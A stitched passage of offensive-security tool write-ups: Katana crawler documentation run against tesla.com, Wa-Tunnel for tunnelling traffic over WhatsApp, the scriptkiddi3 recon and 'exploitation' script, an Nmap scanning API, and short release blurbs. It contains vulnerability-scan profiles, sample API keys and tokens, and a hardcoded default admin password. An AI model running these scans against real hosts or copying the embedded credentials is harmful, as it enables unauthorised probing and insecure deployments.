As default, when scope option is used, it also applies for the links to display as output, as such external URLs are default to exclude and to overwrite this behavior, -do option can be used to display all the external URLs that exist in targets scoped URL / Endpoint.

katana -u https://tesla.com -do

Here is all the CLI options for the scope control -

katana -h scope

Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling

Crawler Configuration

Katana comes with multiple options to configure and control the crawl as the way we want.

-depth

Option to define the depth to follow the urls for crawling, the more depth the more number of endpoint being crawled + time for crawl.

katana -u https://tesla.com -d 5

-js-crawl

Option to enable JavaScript file parsing + crawling the endpoints discovered in JavaScript files, disabled as default.

katana -u https://tesla.com -jc

-crawl-duration

Option to predefined crawl duration, disabled as default.

katana -u https://tesla.com -ct 2

-known-files

Option to enable crawling robots.txt and sitemap.xml file, disabled as default.

katana -u https://tesla.com -kf robotstxt,sitemapxml

-automatic-form-fill

Option to enable automatic form filling for known / unknown fields, known field values can be customized as needed by updating form config file at $HOME/.config/katana/form-config.yaml.

Automatic form filling is experimental feature.

   -aff, -automatic-form-fill  enable optional automatic form filling (experimental)

There are more options to configure when needed, here is all the config related CLI options -

katana -h config

Flags:
CONFIGURATION:
-d, -depth int maximum depth to crawl (default 2)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 2097152)
-timeout int time to wait for request in seconds (default 10)
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file

Filters

-field

Katana comes with built in fields that can be used to filter the output for the desired information, -f option can be used to specify any of the available fields.

   -f, -field string  field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)

Here is a table with examples of each field and expected output when used -

FIELD DESCRIPTION EXAMPLE
url URL Endpoint https://admin.projectdiscovery.io/admin/login?user=admin&password=admin
qurl URL including query param https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin
qpath Path including query param /login?user=admin&password=admin
path URL Path https://admin.projectdiscovery.io/admin/login
fqdn Fully Qualified Domain name admin.projectdiscovery.io
rdn Root Domain name projectdiscovery.io
rurl Root URL https://admin.projectdiscovery.io
file Filename in URL login.php
key Parameter keys in URL user,password
value Parameter values in URL admin,admin
kv Keys=Values in URL user=admin&password=admin
dir URL Directory name /admin/
udir URL with Directory https://admin.projectdiscovery.io/admin/

Here is an example of using field option to only display all the urls with query parameter in it -

katana -u https://tesla.com -f qurl -silent

https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no

Custom Fields

You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at $HOME/.config/katana/field-config.yaml. Alternatively, you can use the -flc option to load a custom field config file from a different location. Here is example custom field.

- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'

- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'

When defining custom fields, following attributes are supported:

  • name (required)

The value of name attribute is used as the -field cli option value.

  • type (required)

The type of custom attribute, currenly supported option - regex

  • part (optional)

The part of the response to extract the information from. The default value is response, which includes both the header and body. Other possible values are header and body.

  • group (optional)

You can use this attribute to select a specific matched group in regex, for example: group: 1

Running katana using custom field:

katana -u https://tesla.com -f email,phone

-store-field

To compliment field option which is useful to filter output at run time, there is -sf, -store-fields option which works exactly like field option except instead of filtering, it stores all the information on the disk under katana_field directory sorted by target url.

katana -u https://tesla.com -sf key,fqdn,qurl -silent
$ ls katana_field/

https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt

The -store-field option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:

  • Identifying the most commonly used parameters
  • Discovering frequently used paths
  • Finding commonly used files
  • Identifying related or unknown subdomains

-extension-match

Crawl output can be easily matched for specific extension using -em option to ensure to display only output containing given extension.

katana -u https://tesla.com -silent -em js,jsp,json

-extension-filter

Crawl output can be easily filtered for specific extension using -ef option which ensure to remove all the urls containing given extension.

katana -u https://tesla.com -silent -ef css,txt,md

Here are additional filter options -

   -f, -field string                field to display in output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

Rate Limit

It's easy to get blocked / banned while crawling if not following target websites limits, katana comes with multiple option to tune the crawl to go as fast / slow we want.

-delay

option to introduce a delay in seconds between each new request katana makes while crawling, disabled as default.

katana -u https://tesla.com -delay 20

-concurrency

option to control the number of urls per target to fetch at the same time.

katana -u https://tesla.com -c 20

-parallelism

option to define number of target to process at same time from list input.

katana -u https://tesla.com -p 20

-rate-limit

option to use to define max number of request can go out per second.

katana -u https://tesla.com -rl 100

-rate-limit-minute

option to use to define max number of request can go out per minute.

katana -u https://tesla.com -rlm 500

Here is all long / short CLI options for rate limit control -

katana -h rate-limit

Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute

Output

Katana support both file output in plain text format as well as JSON which includes additional information like, source, tag, and attribute name to co-related the discovered endpoint.

-output

By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.

katana -u https://example.com -no-scope -output example_endpoints.txt

-json

katana -u https://example.com -json -do | jq .
{
"timestamp": "2022-11-05T22:33:27.745815+05:30",
"endpoint": "https://www.iana.org/domains/example",
"source": "https://example.com",
"tag": "a",
"attribute": "href"
}

-store-response

The -store-response option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the katana_response directory. If you would like to specify a custom directory, you can use the -store-response-dir option.

katana -u https://example.com -no-scope -store-response
$ cat katana_response/index.txt

katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)

Note:

-store-response option is not supported in -headless mode.

Here are additional CLI options related to output -

katana -h output

OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version


Wa-Tunnel - Tunneling Internet Traffic Over Whatsapp


This is a Baileys based piece of code that lets you tunnel TCP data through two Whatsapp accounts.

This can be usable in different situations, for example network carriers that give unlimited whatsapp data or airplanes where you also get unlimited social network data.

It's using Baileys since it's a WS based multi-device whatsapp library and therefore could be used in android in the future, using Termux for example.

The idea is to use it with a proxy setup on the server like this: [Client (restricted access) -> Whatsapp -> Server -> Proxy -> Internet]

Apologizes in advance since Javascript it's not one of my primary coding languages :/

Use only for educational purpose.


How does it work?

It sends TCP network packages through WhatsApp text and file messages, depending on the amount of characters it splits them into different text messages or files.

To not get timed out by WhatsApp by default it's limited at 20k characters per message, at the moment it's hardcoded in wasocket.js. I have done multiple tests and anything below that may get you banned for sending too many messages and any above 80k may timeout.

If a network package is over the limit (20k chars by default) it will be sent as a file if enabled. Also if multiple network packages are cached it will use the same cryteria.

File messages are sent as binary files, TCP responses are concatenated with a delimiter and compressed using brotli to reduce data usage.

It caches TCP socket responses to group them and send the maximum amount of data in a message therefore reducing the amount of messages, improving the speed and reducing the probability of getting banned.

Performance improvements

Before: (without files and no response caching)

curl -x localhost:12345 https://www.youtube.com
- 50-80 messages
- 30-40 seconds

After: (with files and response caching)

curl -x localhost:12345 https://www.youtube.com
- 6-8 messages
- 7-15 seconds

In case you are not allowed to send files use the --disable-files flag when starting the server and client to disable this functionality.

Why?

I got the idea While travelling through South America network data on carriers is usually restricted to not many GBs but WhatsApp is usually unlimited, I tried to create this library since I didn't find any usable at the date.

Setup

You must have access to two Whatsapp accounts, one for the server and one for the client. You can forward a local port or use an external proxy.

Server side

Clone the repository on your server and install node dependencies.

  1. cd path/to/wa-tunnel
  2. npm install

Then you can start the server with the following command where port is the proxy port and host is the proxy host you want to forward. And number is the client WhatsApp number with the country code alltogether and without +.

npm run server host port number

You can use a local proxy server like follows:

npm run server localhost 3128 12345678901

Or you can use a normal proxy server like follows:

npm run server 192.168.0.1 3128 12345678901

Client Side

Clone the repository on your server and install node dependencies.

  1. cd path/to/wa-tunnel
  2. npm install

Then you can start the server with the following command where port is the local port where you will connect and number is the server WhatsApp number with the country code alltogether and without +.

npm run client port number

For example

npm run client 8080 1234567890

Usage

The first time you open the script Baileys will ask you to scan the QR code with the whatsapp app, after that the session is saved for later usage.

It may crash, that's normal after that just restart the script and you will have your client/server ready!

Once you have both client and server ready you can test using curl and see the magic happen.

curl -v -x proxyHost:proxyPort https://httpbin.org/ip

With the example commands would be:

curl -v -x localhost:8080 https://httpbin.org/ip

It has been tested also with a normal browser like Firefox, it's slow but can be used.

You can also forward other protocol ports like SSH by setting up the server like this:

npm run server localhost 22 12345678901

And then connect to the server by using in the client:

ssh root@localhost -p 8080

Usage on Android

To use on Android, you can use it with Termux using the following commands:

pkg update && pkg upgrade
pkg install git nodejs -y
git clone https://github.com/aleixrodriala/wa-tunnel.git
cd wa-tunnel
npm install

Disclaimer

Using this library may get your WhatsApp account banned, use with a temporary number or at your own risk.

TO-DO

  • Make an Android script to install node dependencies on termux
  • When Baileys supports calls, implement package sending through calls
  • Implement sending files for big data packages to reduce messages and maybe improve speed
  • Cache socket responses to reduce even further the amount of messages sent
  • Documentation

License

MIT



American Fuzzy Lop plus plus 4.06c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works โ€ข Installation โ€ข Usage โ€ข MODES โ€ข For Developers โ€ข Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

Updating tool to latest version You can run following command to update tool

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is a implementation for our college PCL project which is still under development and constantly updating.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter Type Description
username string Required. username of the current user
password string Required. current user password
target string Required. The target Hostname and IP

Get item

  GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter Type Description
admin-username String Admin username
admin-passwd String Admin password
id String Id for newly added user
username String Username of the newly added user
passwd String Password of the newly added user
t-username String Target username
t-user-id String Target userID
t-userpass String Target users password
new-t-username String New username for the target
new-t-user-id String New userID for the target
new-t-userpass String New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,



GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily


GVision is a reverse image search app that use Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.


About Google Cloud Vision API

Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.

Getting Started

Before using the app, you need to obtain a Google Cloud Vision API key.

  • Go to the Google Cloud Platform Console.
  • Create a new project or select an existing one.
  • Enable the Cloud Vision API for your project.
  • Create a service account and download a private key in JSON format.
  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.

๏› ๏ธ
Installation

To install the dependencies, simply run the following command:

pip install -r requirements.txt

Running the app

You can run the app locally by running the following command:

streamlit run gvision.py

Usage

Using GVision is simple and straightforward:

  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.
  • Once the key is uploaded, the app will automatically authenticate with the Google Cloud Vision API.
  • Upload an image in JPG, JPEG, or PNG format by clicking on the Choose an image button.
  • Wait for the app to analyze the image. The app will detect landmarks and web entities present in the image and display them on a map.
  • Choose between the different tile options to view the detected landmarks and web entities.

You can also find links to the Google Cloud Vision API documentation and pricing in the Resources section of the sidebar.

To reset the app to its default state or to clear the uploaded image and results, click on the Reset app button.

Resources

Mentions



I2P 2.2.1

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

Suricata IDPE 6.0.11

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

debugHunter - Discover Hidden Debugging Parameters And Uncover Web Application Secrets


Discover hidden debugging parameters and uncover web application secrets with debugHunter. This Chrome extension scans websites for debugging parameters and notifies you when it finds a URL with modified responses. The extension utilizes a binary search algorithm to efficiently determine the parameter responsible for the change in the response.


Features

  • Perform a binary search on a list of predefined query parameters.
  • Compare responses with and without query parameters to identify changes.
  • Track and display the number of modified URLs in the browser action badge.
  • Allow the user to view and clear the list of modified URLs.

Installation

Option 1: Clone the repository

  1. Download or clone this repository to your local machine.
  2. Open Google Chrome, and go to chrome://extensions/.
  3. Enable "Developer mode" in the top right corner if it's not already enabled.
  4. Click the "Load unpacked" button on the top left corner.
  5. Navigate to the directory where you downloaded or cloned the repository, and select the folder.
  6. The debugHunter extension should now be installed and ready to use.

Option 2: Download the release (.zip)

  1. Download the latest release .zip file from the "Releases" section of this repository.
  2. Extract the contents of the .zip file to a folder on your local machine.
  3. Open Google Chrome, and go to chrome://extensions/.
  4. Enable "Developer mode" in the top right corner if it's not already enabled.
  5. Click the "Load unpacked" button on the top left corner.
  6. Navigate to the directory where you extracted the .zip file, and select the folder.
  7. The debugHunter extension should now be installed and ready to use.

Usage

It is recommended to pin the extension to the toolbar to check if a new modified URL by debug parameter is found.

  1. Navigate to any website.
  2. Click on the debugHunter extension icon in the Chrome toolbar.
  3. If the extension detects any URLs with modified responses due to debugging parameters, they will be listed in the popup.
  4. Click on any URL in the list to open it in a new tab.
  5. To clear the list, click on the trash can icon in the top right corner of the popup.

Contributing

We welcome contributions! Please feel free to submit pull requests or open issues to improve debugHunter.



Wireshark Analyzer 4.0.5

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.
โŒ